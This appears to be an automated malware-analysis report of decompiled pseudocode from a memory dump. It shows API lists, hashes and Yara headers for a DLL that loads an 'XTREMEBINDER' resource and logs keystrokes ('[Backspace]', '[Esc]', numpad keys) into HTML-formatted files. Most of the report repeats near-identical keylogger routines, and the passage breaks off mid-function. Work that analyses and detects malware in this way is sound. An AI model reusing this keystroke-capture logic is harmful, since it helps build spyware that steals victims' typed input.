                  								WriteFile(_t249, _v12, _t246 + _t246,  &_v32, 0);
                  							}
                  						}
                  					}
                  					goto L43;
                  				}
                  				E10003A34(_v40, 0);
                  				if(0 == 0) {
                  					goto L7;
                  				} else {
                  					E100037AC(0x1000f6d0, _v16);
                  					_push(L"\r\n\r\n");
                  					_push(_v16);
                  					_push(0x10008bcc);
                  					_push(_v36);
                  					E100039EC();
                  					E10008270(L"\r\n\r\n", _t269,  &_v312, __edi, _t330);
                  					_push(_v312);
                  					_push(L"<FONT COLOR=\"blue\">[");
                  					_t258 =  *0x1000f6d0; // 0x0
                  					E10008270(_t258, _t269,  &_v316, _t328, _t330);
                  					_push(_v316);
                  					_push(0x10008c08);
                  					_push(L" --- ");
                  					E10006B14(0x2f, _t269, 0x3a, 0x20, _t328, _t330,  &_v320);
                  					_push(_v320);
                  					_push(L"</font>");
                  					E10008270(0x10008bcc, _t269,  &_v324, _t328, _t330);
                  					_push(_v324);
                  					E100039EC();
                  					goto L8;
                  				}
                  			}
                  APIs
                  • VirtualFree.KERNEL32(?,00000000,00008000,00000000,10008BA5,?,?,?,0000002E,00000000,00000000), ref: 100085B7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: FreeVirtual
                  • String ID: $ --- $</font>$<FONT COLOR="blue">[
                  • API String ID: 1263568516-341333612
                  • Opcode ID: 844369069b05dfd62b440b7fafa7b9f06d8a9886853feb290a734d0b2ba6acd8
                  • Instruction ID: 82ed3cb906cd8235e36a84cac39b9343783464e2b4201940a396f7c820685ddb
                  • Opcode Fuzzy Hash: 844369069b05dfd62b440b7fafa7b9f06d8a9886853feb290a734d0b2ba6acd8
                  • Instruction Fuzzy Hash: 6F513A78A00119AFEB11DB94CC81FDEB7B9FB48380F5084A1F548A7269DB31BF458B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E1000B700(intOrPtr* __eax) {
                  				struct HINSTANCE__* _t4;
                  				struct HINSTANCE__* _t6;
                  				struct HINSTANCE__* _t8;
                  				void* _t10;
                  				struct HRSRC__* _t17;
                  				void* _t18;
                  				intOrPtr* _t23;
                  				unsigned int _t25;
                  
                  				_t23 = __eax;
                  				E10003770(__eax);
                  				_t4 =  *0x1000f654; // 0x10000000
                  				_t17 = FindResourceW(_t4, L"XTREMEBINDER", 0xa);
                  				_t6 =  *0x1000f654; // 0x10000000
                  				_t25 = SizeofResource(_t6, _t17);
                  				_t8 =  *0x1000f654; // 0x10000000
                  				_t18 = LoadResource(_t8, _t17);
                  				_t10 = LockResource(_t18);
                  				_t24 = _t10;
                  				if(_t10 != 0) {
                  					E10003BE4(_t23, _t25 >> 1);
                  					E100050D0(E1000390C( *_t23), _t24);
                  					return FreeResource(_t18);
                  				}
                  				return _t10;
                  			}
                  APIs
                    • Part of subcall function 10003770: SysFreeString.OLEAUT32(1000CFDC), ref: 1000377E
                  • FindResourceW.KERNEL32(10000000,XTREMEBINDER,0000000A,?,?,1000F834,?,1000B7CA,00000000,1000BC5D,?,1000F834,00000000,00000000,000002C4,00000000), ref: 1000B71A
                  • SizeofResource.KERNEL32(10000000,00000000,10000000,XTREMEBINDER,0000000A,?,?,1000F834,?,1000B7CA,00000000,1000BC5D,?,1000F834,00000000,00000000), ref: 1000B728
                  • LoadResource.KERNEL32(10000000,00000000,10000000,00000000,10000000,XTREMEBINDER,0000000A,?,?,1000F834,?,1000B7CA,00000000,1000BC5D,?,1000F834), ref: 1000B736
                  • LockResource.KERNEL32(00000000,10000000,00000000,10000000,00000000,10000000,XTREMEBINDER,0000000A,?,?,1000F834,?,1000B7CA,00000000,1000BC5D), ref: 1000B73E
                  • FreeResource.KERNEL32(00000000,00000000,10000000,00000000,10000000,00000000,10000000,XTREMEBINDER,0000000A,?,?,1000F834,?,1000B7CA,00000000,1000BC5D), ref: 1000B765
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Resource$Free$FindLoadLockSizeofString
                  • String ID: XTREMEBINDER
                  • API String ID: 1314290513-399165745
                  • Opcode ID: 17ceae75176a0c04b03f872206b008580ef93f74fcc784d7bab5c6ea897d36e1
                  • Instruction ID: 56a9b21ec2ef0885f1dba9b5c05c5a0442ce31da9cf93dba5427497db9e4b129
                  • Opcode Fuzzy Hash: 17ceae75176a0c04b03f872206b008580ef93f74fcc784d7bab5c6ea897d36e1
                  • Instruction Fuzzy Hash: A2F09AAA700A542BB111E7BD8CC1D3F738DEB84AC0B420020F608DB21ECE29FC0543A8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E10001904() {
                  				void* _t2;
                  				void* _t3;
                  				void* _t14;
                  				intOrPtr* _t19;
                  				intOrPtr _t23;
                  				intOrPtr _t26;
                  				intOrPtr _t28;
                  
                  				_t26 = _t28;
                  				if( *0x1000f5b0 == 0) {
                  					return _t2;
                  				} else {
                  					_push(_t26);
                  					_push(E100019DA);
                  					_push( *[fs:edx]);
                  					 *[fs:edx] = _t28;
                  					if( *0x1000f039 != 0) {
                  						_push(0x1000f5b8);
                  						L1000119C();
                  					}
                  					 *0x1000f5b0 = 0;
                  					_t3 =  *0x1000f610; // 0x0
                  					LocalFree(_t3);
                  					 *0x1000f610 = 0;
                  					_t19 =  *0x1000f5d8; // 0x0
                  					while(_t19 != 0x1000f5d8) {
                  						VirtualFree( *(_t19 + 8), 0, 0x8000);
                  						_t19 =  *_t19;
                  					}
                  					E10001204(0x1000f5d8);
                  					E10001204(0x1000f5e8);
                  					E10001204(0x1000f614);
                  					_t14 =  *0x1000f5d0; // 0x0
                  					while(_t14 != 0) {
                  						 *0x1000f5d0 =  *_t14;
                  						LocalFree(_t14);
                  						_t14 =  *0x1000f5d0; // 0x0
                  					}
                  					_pop(_t23);
                  					 *[fs:eax] = _t23;
                  					_push(0x100019e1);
                  					if( *0x1000f039 != 0) {
                  						_push(0x1000f5b8);
                  						L100011A4();
                  					}
                  					_push(0x1000f5b8);
                  					L100011AC();
                  					return 0;
                  				}
                  			}

                  APIs
                  • RtlEnterCriticalSection.KERNEL32(1000F5B8,00000000,100019DA), ref: 10001931
                  • LocalFree.KERNEL32(00000000,00000000,100019DA), ref: 10001943
                  • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000000,100019DA), ref: 10001962
                  • LocalFree.KERNEL32(00000000,?,00000000,00008000,00000000,00000000,100019DA), ref: 100019A1
                  • RtlLeaveCriticalSection.KERNEL32(1000F5B8,100019E1,00000000,00000000,100019DA), ref: 100019CA
                  • RtlDeleteCriticalSection.KERNEL32(1000F5B8,100019E1,00000000,00000000,100019DA), ref: 100019D4
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                  • String ID:
                  • API String ID: 3782394904-0
                  • Opcode ID: 1380d907013bf04497dbd19d8993ee2cfe80bf7fddd9bf3f1e6acc5245a36259
                  • Instruction ID: c7235647f75663e059265485ffa3ed86b09466631e02243638bb2540abc76f59
                  • Opcode Fuzzy Hash: 1380d907013bf04497dbd19d8993ee2cfe80bf7fddd9bf3f1e6acc5245a36259
                  • Instruction Fuzzy Hash: 591182B9604A906EF715DF648CA1BF53799E7452C6F80405CF340879AEDB25A840E761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100070F0(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Numpad /]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Numpad /]
                  • API String ID: 783433895-3841828083
                  • Opcode ID: a69122926cd9ff44543af4826b796c0f070a02847923b1c1add8bc23721ad3f3
                  • Instruction ID: fa9f52e14e4bae6c9c3f3ac931d5b0ad477dd65ff029e14091f69c139beb8dbd
                  • Opcode Fuzzy Hash: a69122926cd9ff44543af4826b796c0f070a02847923b1c1add8bc23721ad3f3
                  • Instruction Fuzzy Hash: 3931BEB8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489B24ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 77%
                  			E10007196(void* __eax, intOrPtr* __ebx, void* __ecx, void* __edx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t130;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				_push(__edx);
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t129 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t129);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t130 = _t56;
                  					if(_t130 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t130 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Numpad *]
                  • API String ID: 783433895-2575978678
                  • Opcode ID: 40a71dd3fd3848f36daa4371efc6091b58f5d128a51f6a9aba358ae957a7c821
                  • Instruction ID: d9c473077837587251831d3c435770d097e1af4f38d4c7dbbca54610dc210ef0
                  • Opcode Fuzzy Hash: 40a71dd3fd3848f36daa4371efc6091b58f5d128a51f6a9aba358ae957a7c821
                  • Instruction Fuzzy Hash: B831C0B8F042545BF722D7658C45B9F73A9FB882C0F50C1A5F5489B20ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007145(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Backspace]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Backspace]
                  • API String ID: 783433895-3993161958
                  • Opcode ID: ce0ad2ca1f90caf9ea666e0b07d6a3e8c10c8d2f93d8c23ca1895d0225b460b2
                  • Instruction ID: 70b2502395a00a419c57d53d4495c89bce5646a586783f0d1f72156cf019b369
                  • Opcode Fuzzy Hash: ce0ad2ca1f90caf9ea666e0b07d6a3e8c10c8d2f93d8c23ca1895d0225b460b2
                  • Instruction Fuzzy Hash: 9031C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007156(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Numpad .]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Numpad .]
                  • API String ID: 783433895-4259747250
                  • Opcode ID: b54b2f61d87570f8875ef0f8debff805adedceafda15ff330bb240909df8f3a1
                  • Instruction ID: 0bc05a9cc8b03a63822bed3d9a4d5e012b227a2082e24ae561fe8c67785f8955
                  • Opcode Fuzzy Hash: b54b2f61d87570f8875ef0f8debff805adedceafda15ff330bb240909df8f3a1
                  • Instruction Fuzzy Hash: 2A31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007178(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Esc]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
